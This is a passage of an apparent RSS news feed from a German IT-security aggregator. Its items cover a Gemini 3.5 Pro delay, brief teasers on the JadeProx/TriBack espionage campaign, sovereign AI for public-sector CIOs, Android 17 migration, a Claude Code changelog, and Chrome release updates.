<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200818/google-ceo-distracts-from-gemini-3-5-pro-delay-with-talk-of-gemini-4-and-monthly-releases.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3689683/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689683/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Thu, 23 Jul 2026 18:35:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4200818/google-ceo-distracts-from-gemini-3-5-pro-delay-with-talk-of-gemini-4-and-monthly-releases.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers’ OPSEC Mistake Exposed a Global Espionage Campaign and Its New TriBack Malware]]></title>
<description><![CDATA[A simple mistake by cyber spies has pulled back the curtain on a wide ranging espionage effort. It reached hospitals, government offices, and schools across several continents in early 2026. In mid April, operators left a staging server open with tools, command history, and phishing packages read...]]></description>
<link>https://tsecurity.de/de/3689517/it-security-nachrichten/hackers-opsec-mistake-exposed-a-global-espionage-campaign-and-its-new-triback-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689517/it-security-nachrichten/hackers-opsec-mistake-exposed-a-global-espionage-campaign-and-its-new-triback-malware/</guid>
<pubDate>Thu, 23 Jul 2026 17:42:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A simple mistake by cyber spies has pulled back the curtain on a wide ranging espionage effort. It reached hospitals, government offices, and schools across several continents in early 2026. In mid April, operators left a staging server open with tools, command history, and phishing packages ready. That slip exposed an active campaign now tracked […]</p>
<p>The post <a href="https://cybersecuritynews.com/opsec-mistake-exposed-triback-malware/">Hackers’ OPSEC Mistake Exposed a Global Espionage Campaign and Its New TriBack Malware</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China-Nexus JadeProx Uses New TriBack Loader to Target Governments, Hospitals, and Universities]]></title>
<description><![CDATA[An exposed directory on an operator-controlled Alibaba Cloud server revealed the inner workings of the JadeProx intrusion set, including bash history, webshell paths, phishing kits, and a full post-exploitation toolkit. From this single staging host, investigators traced concurrent operations tar...]]></description>
<link>https://tsecurity.de/de/3688823/it-security-nachrichten/china-nexus-jadeprox-uses-new-triback-loader-to-target-governments-hospitals-and-universities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688823/it-security-nachrichten/china-nexus-jadeprox-uses-new-triback-loader-to-target-governments-hospitals-and-universities/</guid>
<pubDate>Thu, 23 Jul 2026 13:14:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An exposed directory on an operator-controlled Alibaba Cloud server revealed the inner workings of the JadeProx intrusion set, including bash history, webshell paths, phishing kits, and a full post-exploitation toolkit. From this single staging host, investigators traced concurrent operations targeting a Vietnamese public hospital’s medical imaging system, the Malaysian Ministry of Foreign Affairs, multiple Hong […]</p>
<p>The post <a href="https://cyberpress.org/jadeprox-triback-campaign/">China-Nexus JadeProx Uses New TriBack Loader to Target Governments, Hospitals, and Universities</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688461/it-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Thu, 23 Jul 2026 11:05:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Makes Switching From iPhone Easier With Android 17]]></title>
<description><![CDATA[Switching from iPhone to Android is becoming much easier with Android 17, thanks to a new built-in wireless transfer system that supports more personal data and removes the need for a separate migration app.



Android 17 Transfers More iPhone Data



Google’s upgraded Android Switch experience c...]]></description>
<link>https://tsecurity.de/de/3687946/ios-mac-os/google-makes-switching-from-iphone-easier-with-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687946/ios-mac-os/google-makes-switching-from-iphone-easier-with-android-17/</guid>
<pubDate>Thu, 23 Jul 2026 06:12:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Switching from iPhone to Android is becoming much easier with Android 17, thanks to a new built-in wireless transfer system that supports more personal data and removes the need for a separate migration app.



Android 17 Transfers More iPhone Data



Google’s upgraded Android Switch experience can move photos, videos, contacts, messages, calendar events, saved passwords, Wi-Fi credentials, Google Account details, and an eSIM from an iPhone to a compatible Android phone.



The transfer takes place wirelessly while users set up their new Android device. Since the tool is built directly into Android 17, users do not need to find the correct cable, install another app, or manually sign in to every service.



Moving Google Account information also means users can arrive on their new phone already signed in. Transferring saved passwords and Wi-Fi details should further reduce the amount of setup required after the migration finishes.



An iPhone With iOS 26.3 Is Required



The iPhone must run iOS 26.3 or later, while the receiving phone needs a compatible version of Android 17. Apple also provides the transfer option through the iPhone’s Settings app, where users can begin moving their data and supported eSIM.



Users should keep both phones close together and connected throughout the process. Carrier support can also affect whether an eSIM transfers successfully.



Available on Pixel and Samsung Phones



The improved switching experience has started rolling out to select Pixel devices. Google says it will also be available on Samsung’s Galaxy Z Flip8 and Galaxy Z Fold8, with support planned for more Android phones.



The update makes changing mobile platforms less time-consuming, especially for people who previously avoided switching because their passwords, network settings, or mobile number were difficult to move.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.218]]></title>
<description><![CDATA[What's changed

Changed /code-review to run as a background subagent, so review work no longer fills your conversation and keeps stacked slash commands as its review target
Added screen-reader announcements of deleted text for word and line deletions (Option+Delete, Ctrl+W, Cmd+Backspace, Ctrl+U,...]]></description>
<link>https://tsecurity.de/de/3687638/downloads/v21218/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687638/downloads/v21218/</guid>
<pubDate>Wed, 22 Jul 2026 23:32:59 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Changed <code>/code-review</code> to run as a background subagent, so review work no longer fills your conversation and keeps stacked slash commands as its review target</li>
<li>Added screen-reader announcements of deleted text for word and line deletions (<code>Option+Delete</code>, <code>Ctrl+W</code>, <code>Cmd+Backspace</code>, <code>Ctrl+U</code>, <code>Ctrl+K</code>) in <code>--ax-screen-reader</code> mode</li>
<li>Fixed Windows paths with <code>\u</code>-prefixed segments (like <code>C:\Users\unicorn</code>) being corrupted into CJK characters in tool inputs, which made those files inaccessible</li>
<li>Fixed the left arrow key discarding the conversation with no undo: presses right after editing now ask to confirm, and Esc in the agent view returns to the conversation it backgrounded</li>
<li>Added HTTP status and error text to <code>claude mcp list</code> and <code>/mcp</code> when a server fails to connect, and a warning for MCP config values with hidden leading or trailing whitespace</li>
<li>Fixed multi-line paste collapsing into one line with <code>j</code> in place of newlines in terminals that encode pasted newlines as Ctrl+J</li>
<li>Fixed <code>/context</code> reporting stale pre-compact token usage after compacting from the message picker</li>
<li>Fixed <code>/ultrareview</code> failing on descriptive arguments like "review my auth changes" — they now run a review of your current branch with the text applied as a note to the findings</li>
<li>Fixed <code>/code-review ultra</code> silently running a local review in non-interactive sessions — it now launches the cloud review</li>
<li>Fixed gateway spend metering to price Bedrock application-inference-profile ARNs and other config-mapped upstream model IDs at the configured model's rates</li>
<li>Fixed mojibake when a long IDE selection was truncated mid-emoji, and a case where a tool executor error could be silently dropped</li>
<li>Fixed an engine teardown race that could start and abandon a phantom turn, and made input pushed after close consistently rejected</li>
<li>Fixed spurious "[Request interrupted by user]" messages after interrupted tool calls, and an unpaired <code>tool_use</code> block left in the transcript when a tool aborted mid-response</li>
<li>Fixed VoiceOver reading "new line" instead of echoing the typed space at the end of the input in <code>--ax-screen-reader</code> mode</li>
<li>Fixed plugin and settings panels not moving the terminal cursor to the focused row, so screen readers and magnifiers can follow arrow-key navigation</li>
<li>Fixed crashes (maximum call stack exceeded) when a deeply nested watched directory tree was deleted or moved, and when rendering deeply nested UI trees</li>
<li>Fixed pull request events occasionally being lost when a session exited immediately after creating or linking a PR</li>
<li>Fixed the Bedrock setup wizard failing profile verification for assume-role profiles in partitioned AWS regions and on proxy-only networks</li>
<li>Fixed rare negative or incorrect turn duration measurements after a system clock adjustment by timing turns with a monotonic clock</li>
<li>Fixed the "N MCP servers need authentication" startup notice over-counting claude.ai connectors that aren't connected in claude.ai</li>
<li>Fixed prompt history entries being dropped or duplicated when history writes raced or failed</li>
<li>Fixed a retry loop that re-sent identical doomed requests after a context-overflow error with a large thinking budget; <code>Ctrl+B</code> backgrounding now applies the same background-shell caps as other paths</li>
<li>Fixed agent frontmatter hooks running from untrusted folders: hooks now require the agent file's own folder to have accepted workspace trust</li>
<li>Fixed fork-session lineage being lost after compaction in headless and SDK sessions</li>
<li>Fixed a resumed session failing every turn, or crashing on resume, when its history held a malformed delta attachment</li>
<li>Improved <code>/ultrareview</code> error feedback so Claude can correct an invalid argument instead of retrying it unchanged</li>
<li>Improved auto mode: the dangerous-rm, background-<code>&amp;</code>, and suspicious-Windows-path checks no longer open permission dialogs; the auto-mode classifier adjudicates them instead</li>
<li>Improved sandbox command restrictions for IDE interactions</li>
<li>Improved trust dialogs to name the repository root the grant covers</li>
<li>Changed <code>/deep-research</code> to start only when invoked manually; Claude no longer launches it on its own</li>
<li>Changed plan mode with auto to no longer prompt for Bash commands the static analyzer can't prove read-only; the auto-mode classifier judges them instead</li>
<li>Added an announcement when fast mode changes as a result of switching models via <code>/config model=&lt;x&gt;</code> or Remote Control</li>
<li>Changed server-managed settings so benign feature and cost toggles no longer trigger the settings-approval prompt</li>
<li>Changed agent markdown files to reject agent names containing <code>:</code>, which is reserved for plugin namespacing</li>
<li>Changed skills with <code>context: fork</code> to run in the background by default; opt out per skill with <code>background: false</code></li>
<li>Added <code>yes</code>/<code>no</code>/<code>on</code>/<code>off</code>/<code>1</code>/<code>0</code> (case-insensitive) as accepted values for skill and plugin frontmatter booleans, alongside <code>true</code>/<code>false</code></li>
<li>Fixed remote sessions continuing to send heartbeats after their worker was replaced, which left long-lived desktop and IDE processes retrying a rejected request every few seconds forever</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Desktop Update]]></title>
<description><![CDATA[The Beta channel has been updated to 151.0.7922.47 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place ...]]></description>
<link>https://tsecurity.de/de/3687357/it-security-nachrichten/chrome-beta-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687357/it-security-nachrichten/chrome-beta-for-desktop-update/</guid>
<pubDate>Wed, 22 Jul 2026 20:58:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Beta channel has been updated to 151.0.7922.47 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.34..151.0.7922.47?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Stable Update for Desktop]]></title>
<description><![CDATA[ The Stable channel has been updated to 151.0.7922.47/.48 for Windows and Mac as part of our early stable release to a small percentage of users. A full list of changes in this build is available in the log.You can find more details about early Stable releases here.Interested in switching release...]]></description>
<link>https://tsecurity.de/de/3687356/it-security-nachrichten/early-stable-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687356/it-security-nachrichten/early-stable-update-for-desktop/</guid>
<pubDate>Wed, 22 Jul 2026 20:58:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p> <span>The Stable channel has been updated to </span><span>151.0.7922.47/.48</span><span> for Windows and</span><span> </span><span>Mac </span><span>as part of our early stable release to a <span>small percentage of users. </span>A full list of changes in this build is available in the</span><span> </span><span color="rgba(0, 0, 0, 0.87)"><a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.34..151.0.7922.48?pretty=fuller&amp;n=10000">log</a></span><span>.</span></p><div class="post-body"><div class="post-content post-original" itemprop="articleBody"><div class="post-body"><div class="post-content post-original" itemprop="articleBody"><p dir="ltr"><span><span>You can find more details about early Stable releases </span><a href="https://developer.chrome.com/blog/early-stable/"><span>here</span></a><span>.</span></span></p><p dir="ltr"><span>Interested in switching release channels?  Find out how </span><a href="https://www.chromium.org/getting-involved/dev-channel"><span>here</span></a><span>. If you find a new issue, please let us know by </span><a href="https://crbug.com/"><span>filing a bug</span></a><span>. </span><span>The </span><a href="https://support.google.com/chrome/community"><span>community help forum</span></a><span> is also a great place to reach out for help or learn about common issues.</span></p><p><span color="rgba(0, 0, 0, 0.87)"><br></span></p><p dir="ltr"><span>Daniel Yip</span></p><p dir="ltr"><span>Google Chrome</span></p></div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jack Dorsey Takes On Slack and GitHub With New AI Workplace Platform 'Buzz']]></title>
<description><![CDATA[Jack Dorsey's Block has launched Buzz, an open-source workplace collaboration platform that combines messaging, project management, and software development workflows for teams of both humans and AI agents. Dorsey described Buzz as "a new groupchat platform for teams of people and agents of all s...]]></description>
<link>https://tsecurity.de/de/3686825/it-security-nachrichten/jack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686825/it-security-nachrichten/jack-dorsey-takes-on-slack-and-github-with-new-ai-workplace-platform-buzz/</guid>
<pubDate>Wed, 22 Jul 2026 17:19:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
